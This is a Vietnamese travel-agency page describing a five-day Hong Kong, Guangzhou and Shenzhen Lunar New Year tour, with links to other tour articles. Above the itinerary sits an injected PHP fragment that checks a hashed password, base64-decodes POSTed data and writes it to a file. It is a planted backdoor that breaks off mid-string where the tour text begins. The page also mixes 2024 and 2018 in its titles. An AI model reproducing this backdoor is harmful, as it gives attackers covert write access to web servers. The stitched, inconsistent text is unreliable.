function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Tour Hong Kong – Thẩm Quyến 5N4Đ dịp Tết ÂL 2024 - Đi Để Đến

Tour Hong Kong – Thẩm Quyến 5N4Đ dịp Tết ÂL 2024

27/11/2017 Đi Để Đến - Group

Ngày 1: TPHCM – Hong Kong

Qúy khách tập trung tại cột số 10, lầu 2, cổng số 2 ga đi quốc tế, sân bay Tân Sơn Nhất. Hướng dẫn viên công ty du lịch sẽ đến làm thủ tục cho đoàn và khởi hành cùng đoàn đáp chuyến bay đi Hong Kong.

Đoàn đến sân bay Chek Lap Kok (Hong Kong), đoàn làm thủ tục nhập cảnh, nhận hành lý cá nhân. Xe và hướng dẫn viên địa phương đón đoàn, di chuyển vào trung tâm Hong Kong. Tại đây quý khách bắt đầu tham quan cầu Thanh Mã – một trong những cây cầu lớn và độc đáo nhất thế giới.

Tour Hong Kong – Thẩm Quyến 5N4Đ dịp Tết ÂL 2018

Cầu Thanh Mã là một trong những cây cầu lớn nhất thế giới – Ảnh sưu tầm

Qúy khách dùng bữa trưa tại nhà hàng địa phương. Sau đó lên đường tham quan chương trình City tour.

Đi xe điện cáp treo lên tham quan Victory Peak, hay còn gọi là đỉnh núi Thái Bình. Từ đây quý khách có thể chiêm ngưỡng toàn cảnh vịnh Victoria, nhìn ngắm một phần Hong Kong và chụp hình lưu niệm cùng cảnh sắc tuyệt đẹp của Hương Cảng.

Vịnh Nước Cạn: Một trong những điểm tham quan nổi tiếng nhất Hong Kong. Nơi đây có vịnh nước trong xanh, bãi cát trắng hình lưỡi liềm trải dài cùng nhiều nhà hàng, quán ăn sang trọng. Đây cũng là một trong những khu dân cư có giá nhà đắt đỏ bậc nhất Hong Kong, đặc biệt có tòa nhà phong thủy, nơi được xem là mang lại may mắn cho các chủ nhân sinh sống tại đây.

đặt tour Hong Kong – Thẩm Quyến 5N4Đ dịp Tết ÂL 2018

Vịnh nước cạn thu hút du khách bởi vẻ đẹp kỳ vỹ, thanh bình – Ảnh: Internet

Viếng miếu Thần Tài cầu sức khỏe, bình an cho gia đình.

Đoàn dùng bữa tối với món lẩu “Tả Pín Lù” tự chọn với các nguyên liệu tươi ngon như bò Mỹ, tôm, mực,… Qúy khách dùng nước ngọt, bia không hạn chế.

Sau đó, quý khách về khách sạn nhận phòng, nghỉ ngơi. Hoặc tự do mua sắm tại Ladies Market – chợ Qúy Bà. Dọc con đường dài hơn 1km có bán đầy đủ mặt hàng từ quần áo, giày dép, đồ trang sức, phụ kiện, đồ chơi trẻ em đến đồ lưu niệm, thực phẩm khô với giá rất bình dân.

Qúy khách nghỉ đêm tại Hong Kong.

Ngày 2: Khám phá Hong Kong

Đoàn dùng điểm tâm sáng tại khách sạn. Sau đó tham quan:

Nhà Bàn Giao – Quảng trường Dương Tử Kinh: Nơi diễn ra các sự kiện, hoạt động quan trọng của Hong Kong.  

Đại lộ Ngôi Sao: Có chiều dài gần nửa km gắn 100 ngôi sao in dấu vân tay và chữ ký của các nhân vật nổi tiếng ở Hong Kong. Đặc biệt có tượng đồng của nghệ sĩ nổi tiếng Thành Long.

Trung tâm sản xuất vàng bạc đá quý và trung tâm miễn thuế PDW

Tầng 100 của tòa nhà Sky 100: Tại đây, quý khách khám phá, ngắm nhìn toàn cảnh thành phố Hong Kong với góc nhìn 360 độ từ trên cao.

Chùa Wong Tai Sin: Hay còn gọi là miếu Huỳnh Đại Tiên. Ngôi chùa này nổi tiếng linh thiêng, được người dân địa phương cũng như du khách thường xuyên lui tới chiêm ngưỡng, cúng bái.

mua tour Hong Kong – Thẩm Quyến 5N4Đ dịp Tết ÂL 2018 giá rẻ nhất

Đoàn đến miếu Huỳnh Đại Tiên chiêm bái cầu bình an cho gia đình – Ảnh: Internet

Trưa: Qúy khách dùng bữa tại nhà hàng địa phương.

Chiều: Qúy khách tự do sinh hoạt, tham quan và mua sắm.

Hoặc bạn có thể đến công viên giải trí Disney Land. Đây được xem như thiên đường giải trí độc đáo, thú vị bậc nhất châu Á. Đến Disney Land, quý khách có thể tham gia các trò chơi, xem các chương trình biểu diễn đặc sắc. Ngoài ra còn có hội chiêm ngưỡng, hòa mình vào không khí của những lễ hội sôi động. Vé tham khảo: 105 USD/khách (khách tự túc chi phí).

Hành khách cũng có thể đăng ký tham gia tour tham quan Đại Nhĩ Sơn. Ngoài cảnh quan tươi đẹp, không gian thoáng đãng thì nơi đây còn có điểm nổi bật là bức tượng Phật bằng đồng với độ cao hơn 34 mét. Vé tham quan nơi này 85 USD/khách.

đặt tour du lịch Hong Kong - Thẩm Quyến dịp tết nguyên đán giá tốt nhất

Các chương trình đặc sắc tại Disney Land – Ảnh sưu tầm

Ngày 3: Hong Kong – Quảng Châu

Qúy khách dùng điểm tâm, làm thủ tục trả phòng khách sạn. Đoàn khởi hành đi Quảng Châu, đến đây tham quan Nhà tưởng niệm Tôn Trung Sơn – nơi lưu giữ nhiều hình ảnh, tư liệu liên quan đến cuộc đời và sự nghiệp của nhà lãnh đạo Trung Quốc lừng danh.

Qúy khách dùng cơm trưa, sau đó tham quan Viện nghiên cứu thuốc bắc nổi tiếng Quảng Châu – Bảo Thụ Đường, nơi đây chuyên nghiên cứu và phát triển tinh hoa dược học Trung Quốc.

đặt tour du lịch Hong Kong - Thẩm Quyến dịp tết nguyên đán giá hấp dẫn

Khu phố mua sắm Bắc Kinh Lộ luôn thu hút rất đông du khách – Ảnh: Internet

Đoàn dùng bữa tối, sau đó tự do tham quan mua sắm tại Bắc Kinh Lộ – khu phố tập trung rất nhiều thương hiệu lớn, nổi tiếng trên khắp thế giới. Ngoài bán sản phẩm chính là quần áo, phụ kiện, đồ trang sức thì nơi đây còn có một khu nhỏ chuyên bán các món ăn truyền thống của Trung Quốc.

Đoàn nghỉ đêm tại Quảng Châu.

Ngày 4: Quảng Châu – Thẩm Quyến

Sau khi dùng điểm tâm, đoàn đi tham quan Yue Xi Park – Công viên Việt Tú. Nơi đây có diện tích khoảng 800,000 m2, ngoài tham quan, chụp hình thì đoàn còn dành thời gian viếng thăm đài liệt sĩ Hoàng Hoa Cương, viếng mộ liệt sĩ Phạm Hồng Thái – người ném bom mưu sát toàn quyền Đông Dương năm 1924.

Sau đó, quý khách sẽ ghé thăm Five Rams Sculpture – tượng Ngũ Dương: Đây được xem là biểu tượng của thành phố Quảng Châu.

mua tour du lịch Hong Kong - Thẩm Quyến dịp tết âm lịch 2018 giá tốt nhất

Mô hình mô phỏng một số công trình kiến trúc nổi tiếng của Trung Quốc – Ảnh: Internet

Trưa: Đoàn dùng bữa tại nhà hàng với những món ăn đặc sản của Quảng Châu. Sau đó, đoàn di chuyển đến bảo tàng ShenZhen, cửa hàng công nghiệp tơ lụa và ngọc trai “Làng văn hóa dân tộc Trung Hoa – Trung Hoa Cẩm Tú”. Tham quan nơi đây, quý khách sẽ hiểu hơn về những nét tiêu biểu của đất nước Trung Hoa qua 5000 năm lịch sử.

Qúy khách dùng bữa tối. Sau đó thưởng thức các show biểu diễn độc đáo của các dân tộc thiểu số tại đây như: “Quyến rũ Đông Phương”, “Long Phụng Vũ Trung Hoa” – show diễn hoành tráng với sự kết hợp giữa ánh đèn, điệu nhạc. Quý khách có thể tự do mua sắm tại chợ Đông Môn – khu mua sắm nổi tiếng bậc nhất Thẩm Quyến.

Nghỉ đêm tại Thẩm Quyến

Ngày 5: Thẩm Quyến – Hong Kong – TPHCM

Qúy khách dùng điểm tâm, trả phòng. Về lại Hong Kong bằng tàu cao tốc. Xe đưa đoàn ra sân bay Chek Lap Kok đáp chuyến bay về lại TPHCM. Đoàn đến sân bay Tân Sơn Nhất, kết thúc tour du lịch nước ngoài 5N4Đ. Hướng dẫn viên chia tay, hẹn gặp lại quý khách trong các hành trình khác.

Like Đi Để Đến trên fanpage và follow trên twitter để cập nhật thêm nhiều thông tin thú vị cho bạn!

  • Tour Bình Châu 1 ngày tắm suối khoáng nóng siêu độc đáo
    Tour Bình Châu 1 ngày tắm suối khoáng nóng có đang được bạn quan tâm trong chuyến du lịch Vũng Tàu sắp tới? Chắc chắn nhiều người sẽ thắc mắc rằng đi Bình Châu thì nên tham gia những hoạt động gì, ăn gì, ở đâu? Bài viết sau đây của Đi Để Đến sẽ […]
  • Tour du lịch Vũng Tàu siêu hấp dẫn trong dịp cuối năm 2023
    Tour du lịch Vũng Tàu là lựa chọn phổ biến với những ai đang cần nạp “vitamin sea”. Vũng Tàu nổi tiếng là vùng biển yên bình, thú vị và tràn đầy sức sống. Vũng Tàu cách TP.HCM khoảng 110 km và tốn thời gian di chuyển khoảng 2 giờ. Nếu bạn đang có kế […]
  • Tất tần tật kinh nghiệm đi Tà Xùa chi tiết nhất 2023
    Tà Xùa được biết đến là thiên đường săn mây đẹp nhất ở vùng núi Tây Bắc. Theo kinh nghiệm đi Tà Xùa thì nơi đây là một trong những điểm đến được giới trẻ yêu thích nhất. Tà Xùa quanh năm được bao phủ bởi mây trắng bồng bềnh trên các đỉnh núi. Bạn […]
  • Đi Phú Quốc mùa nào đẹp? Top 10 địa điểm siêu hấp dẫn
    Đi Phú Quốc mùa nào đẹp chắc hẳn là câu hỏi mà rất nhiều người đang băn khoăn! “Đảo ngọc” Phú Quốc đang là một “thiên đường nghỉ dưỡng” được rất nhiều khách du lịch trong nước và nước ngoài săn đón. Nơi đây không chỉ thu hút du khách bởi những dãy núi non […]
  • Tour Singapore 5 ngày 4 đêm – Khám phá vẻ đẹp đảo quốc sư tử
    Singapore được biết đến là một đất nước hiện đại, năng động và phát triển. Nơi đây còn nổi tiếng với nhiều danh lam thắng cảnh và ẩm thực độc đáo. Lựa chọn tour Singapore 5 ngày 4 đêm sẽ mang đến cho bạn chuyến hành trình thú vị. Cùng Đi Để Đến khám phá […]
  • Du lịch Thái Lan đi đâu? Khám phá xứ sở chùa Vàng dịp hè 2023
    Bạn có biết du lịch Thái Lan đi đâu là thú vị nhất chưa? Những năm gần đây Thái Lan đang trở thành điểm du lịch hấp dẫn. Nơi đây còn nổi tiếng với nhiều điểm vui chơi thú vị, thu hút đông đảo du khách. Những bạn lần đầu đến Thái Lan sẽ không […]